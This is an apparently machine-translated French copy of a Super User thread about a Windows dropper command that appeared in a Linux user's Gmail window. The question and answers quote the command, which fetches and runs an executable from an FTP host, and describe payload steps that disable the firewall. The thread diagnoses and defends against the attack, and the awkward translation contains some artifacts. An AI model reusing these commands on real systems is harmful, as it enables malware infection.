Comment identifier si mon ordinateur Linux a été piraté?

128

Mon ordinateur personnel est généralement allumé, mais le moniteur est éteint. Ce soir, je suis rentré du travail à la maison et j'ai trouvé ce qui ressemblait à une tentative de piratage: dans mon navigateur, mon compte Gmail était ouvert (c'était moi), mais il était en mode composition avec les éléments suivants sur le TOterrain:

md / c echo open cCTeamFtp.yi.org 21 >> ik & echo utilisateur ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo Vous avez été propriétaire

Pour moi, cela ressemble à un code de ligne de commande Windows, et le mddébut du code, combiné au fait que Gmail était en mode de composition, indique clairement que quelqu'un a essayé d'exécuter une cmdcommande. Je suppose que j'ai eu de la chance de ne pas utiliser Windows sur ce PC, mais j'en ai d'autres. C'est la première fois que quelque chose comme ça m'est arrivé. Je ne suis pas un gourou de Linux et je n'exécutais aucun programme autre que Firefox à l'époque.

Je suis absolument sûr de ne pas avoir écrit cela, et personne d'autre n'était physiquement à mon ordinateur. De plus, j'ai récemment changé mon mot de passe Google (et tous mes autres mots de passe) en quelque chose comme: vMA8ogd7bvje ne pense donc pas que quelqu'un ait piraté mon compte Google.

Qu'est-ce qui vient de se passer? Comment faire pour que quelqu'un frappe sur mon ordinateur alors que ce n'est pas la vieille machine Windows de mamie qui exécute des logiciels malveillants depuis des années, mais une récente installation Ubuntu?

Mise à jour:
Permettez-moi d'aborder quelques points et questions:

  • Je suis en Autriche, à la campagne. Mon routeur WLAN exécute WPA2 / PSK et un mot de passe moyen fort qui ne figure pas dans le dictionnaire. devrait être brute-force et moins de 50 mètres d'ici; il est peu probable qu'il ait été piraté.
  • J'utilise un clavier filaire USB, donc encore une fois très peu probable que quelqu'un puisse être à portée de main pour le pirater.
  • Je n'utilisais pas mon ordinateur à l'époque; c'était juste au ralenti à la maison pendant que j'étais au travail. C'est un PC nettop monté sur un moniteur, donc je l'éteins rarement.
  • La machine n’a que deux mois, ne fonctionne que sous Ubuntu, et je n’utilise pas de logiciels étranges, ni de sites étranges. C'est principalement Stack Exchange, Gmail et les journaux. Pas de jeux. Ubuntu est prêt à se tenir à jour.
  • Je ne suis au courant d'aucun service VNC en cours d'exécution; Je n'ai certainement pas installé ou activé un. Je n'ai pas non plus démarré d'autres serveurs. Je ne suis pas sûr si certains fonctionnent sous Ubuntu par défaut?
  • Je connais toutes les adresses IP dans l'activité du compte Gmail. Je suis à peu près sûr que Google n'était pas une porte d'entrée.
  • J'ai trouvé une visionneuse de fichiers journaux , mais je ne sais pas quoi chercher. Aidez-moi?

Ce que je veux vraiment savoir, c’est ce qui me rend mal à l’aise, c’est: comment une personne sur Internet peut-elle générer des frappes au clavier sur ma machine? Comment puis-je empêcher cela sans en être tout à fait couvert? Je ne suis pas un geek sous Linux, je suis un père qui bousille Windows depuis plus de 20 ans et qui en a marre. Et depuis plus de 18 ans que je suis en ligne, je n’ai personnellement jamais assisté à une tentative de piratage informatique, c’est donc nouveau pour moi.

Torben Gundtofte-Bruun
la source
4
Est-ce que quelqu'un d'autre a eu accès à votre ordinateur ou avez-vous un très vieux clavier sans fil? En outre, Ubuntu a un serveur VNC intégré. Si cela est actif, un script aléatoire aurait pu être connecté quelque part et supposer qu'il s'agissait d'un ordinateur Windows, envoyant les combinaisons de touches WIN + R, cmd ......
TuxRug Le
29
@torbengb: Votre message me fait vraiment peur ...
Mehrdad
9
Y a-t-il d'autres ordinateurs sur votre réseau sans fil? Si l'intrus venait à briser leur sécurité, cela lui donnerait un "pouce" sur votre réseau local, ce qui pourrait conduire à la destruction de la boîte Ubuntu de différentes manières.
CarlF
4
@muntoo ... et je suis sûr que vous ne l'avez pas écrit nulle part et que vous n'utilisez aucune application pour les gérer non plus, n'est-ce pas? Ne commençons pas le mot de passe bashing; du moins mon mot de passe n'est pas password:-)
Torben Gundtofte-Bruun le
6
As-tu un chat?
Zaki

Réponses:

66

Je doute que tu aies de quoi t'inquiéter. Il s'agissait probablement d'une attaque JavaScript qui tentait de télécharger un lecteur par téléchargement . Si cela vous inquiète, commencez à utiliser les modules complémentaires NoScript et AdBlock Plus Firefox.

Même en visitant des sites fiables, vous n’êtes pas en sécurité car ils utilisent du code JavaScript provenant d’annonceurs tiers et qui peut être malveillant.

Je l'ai attrapé et l'ai exécuté dans une machine virtuelle. Il a installé mirc et c’est le journal d’état ... http://pastebin.com/Mn85akMk

Il s’agit d’une attaque automatisée qui essaie de vous demander de télécharger mIRC et de vous associer à un botnet qui vous transformera en spambot ... La ma VM s’est jointe et a établi une connexion à plusieurs adresses distantes, dont l’une autoemail-119.west320.com.

Pour l'exécuter sous Windows 7, je devais accepter l'invite UAC et lui permettre d'accéder à travers le pare-feu.

Il semble y avoir des tonnes de rapports de cette commande exacte sur d'autres forums, et quelqu'un dit même qu'un fichier torrent a essayé de l'exécuter une fois le téléchargement terminé ... Je ne sais pas comment cela serait possible.

Je ne l'ai pas utilisé moi-même, mais il devrait pouvoir vous montrer les connexions réseau actuelles pour que vous puissiez voir si vous êtes connecté à quelque chose qui sort de la norme: http://netactview.sourceforge.net/download.html

Riguez
la source
10
Euh, pourquoi tous les commentaires (même ceux très pertinents qui ont découvert que le script tentait d'ouvrir une cmdfenêtre) ont été supprimés !?
BlueRaja - Danny Pflughoeft
Serais-je aussi à l'abri de ce type d'attaque si je commençais tout juste à utiliser uBlock Origin?
RobotUnderscore
42

Je suis d'accord avec @ jb48394 que c'est probablement un exploit JavaScript, comme tout le reste ces jours-ci.

Le fait qu’il ait tenté d’ouvrir une cmdfenêtre (voir le commentaire de @ torbengb ) et d’exécuter une commande malveillante, plutôt que de simplement télécharger le cheval de Troie discrètement en arrière-plan, laisse penser qu’il exploite une vulnérabilité dans Firefox qui lui permet d’entrer des frappes, pas exécuter le code.

Cela explique également pourquoi cet exploit, qui était clairement écrit exclusivement pour Windows, fonctionnerait également sous Linux: Firefox exécute JavaScript de la même manière dans tous les systèmes d'exploitation (du moins, il essaye de :)) . Si cela était dû à un dépassement de tampon ou à un exploit similaire destiné à Windows, le programme aurait été bloqué.

En ce qui concerne l’origine du code JavaScript, il s’agit probablement d’une annonce Google malveillante (les annonces circulent dans Gmail toute la journée) . Il ne serait pas être la première fois .

BlueRaja - Danny Pflughoeft
la source
4
Belles références.
kizzx2
9
Pour info pour les skimmers, ce dernier "lien" est en fait cinq liens distincts.
Pops le
Ce serait assez choquant s'il s'agissait vraiment d'un exploit Javascript, car Firefox reste normalement ouvert pendant des jours. Cependant, vous devez appeler une API spéciale pour envoyer les clés à un autre système sous Windows et probablement à un autre appel système (s'il existe) sous Linux. Comme l'envoi de frappes au clavier n'est pas une opération Javascript normale, je doute que Firefox mette en œuvre un appel multiplate-forme pour cela.
billc.cn
1
@ billc.cn: Je pense que l'écriture sur la mémoire tampon du clavier PS / 2 fonctionne de la même manière, quel que soit le système d'exploitation utilisé .
BlueRaja - Danny Pflughoeft le
12

J'ai trouvé une attaque similaire sur une autre machine Linux. Il semble que ce soit une sorte de commande FTP pour Windows.

Shekhar
la source
8
Plus précisément, il télécharge et exécute le fichier ftp://ccteam10:[email protected]/svcnost.exeà l'aide de l' ftpoutil de ligne de commande Windows .
Grawity
Je l' ai
Shekhar
voici des infos sur le site whois.domaintools.com/216.210.179.67
Shekhar
9
Il s’agit d’un package WinRAR SFX contenant une installation mIRC portable et un fichier appelé "DriverUpdate.exe". DriverUpdate.exe exécute (au moins) deux commandes shell: le pare-feu netsh définit l'opmode désactivé et le taskkill / F / IM VCSPAWN.EXE / T Il tente également (je pense) d'ajouter die-freesms-seite.com à la zone sécurisée d'Internet Explorer. et contournement par procuration.
Andrew Lambert
5

Cela ne répond pas à l'ensemble de votre question, mais dans le fichier journal, recherchez les tentatives de connexion infructueuses.

S'il y a plus de cinq tentatives infructueuses dans votre journal, quelqu'un essaie de craquer root. Si rootvous avez réussi à vous connecter alors que vous étiez loin de votre ordinateur, CHANGEZ VOTRE MOT DE PASSE IMMÉDIATEMENT !! Je veux dire maintenant! De préférence à quelque chose alphanumérique, et environ 10 caractères de long.

Avec les messages que vous avez reçus (les echocommandes), cela ressemble vraiment à un script immature . Si c’était un véritable pirate informatique qui savait ce qu’il faisait, vous ne le sauriez probablement pas encore.

Nate Koppenhaver
la source
2
Je suis d'accord que c'était évidemment très amateur. Au moins, ils n'auraient pas dû mettre l' écho de votre propriété à la fin. Je me demande si des "vrais hackers" sont passés? Ou bien je devrais peut-être demander, combien?
Torben Gundtofte-Bruun le
1
@torgengb: si la commande était exécutée dans une invite de commande Windows, vous ne &exit
verriez
-1

whois rapports west320.com appartient à Microsoft.

UPnP et Vino (Système -> Préférences -> Bureau à distance) associés à un mot de passe Ubuntu faible?

Avez-vous utilisé des référentiels non standard?

Le DEF CON organise chaque année un concours Wi-Fi pour déterminer à quelle distance un point d’accès Wi-Fi peut être atteint - la dernière fois que j’ai entendu dire que c’était 250 milles.

Si vous voulez vraiment avoir peur, regardez les captures d'écran du centre de contrôle-commande d'un réseau de zombies Zeus . Aucune machine n'est sûre, mais Firefox sous Linux est plus sûr que les autres. Mieux encore, si vous utilisez SELinux .

rjt
la source
1
L’auteur de cet exploit n’avait clairement pas l’intention d’exécuter cela sous Linux. Je doute donc qu’il s’agisse d’un utilitaire vulnérable pour gnome ou d’un mot de passe faible (OP ayant déjà indiqué qu’il dispose d’un mot de passe sécurisé)
BlueRaja - Danny Pflughoeft
En fait, il ne mentionne pas avoir un mot de passe Ubuntu, juste un mot de passe gmail et sans fil. Un enfant qui utilise metasploit n’est peut-être même pas au courant de Linux, il ne fait que voir VNC. C'est très probablement une attaque javascript.
rjt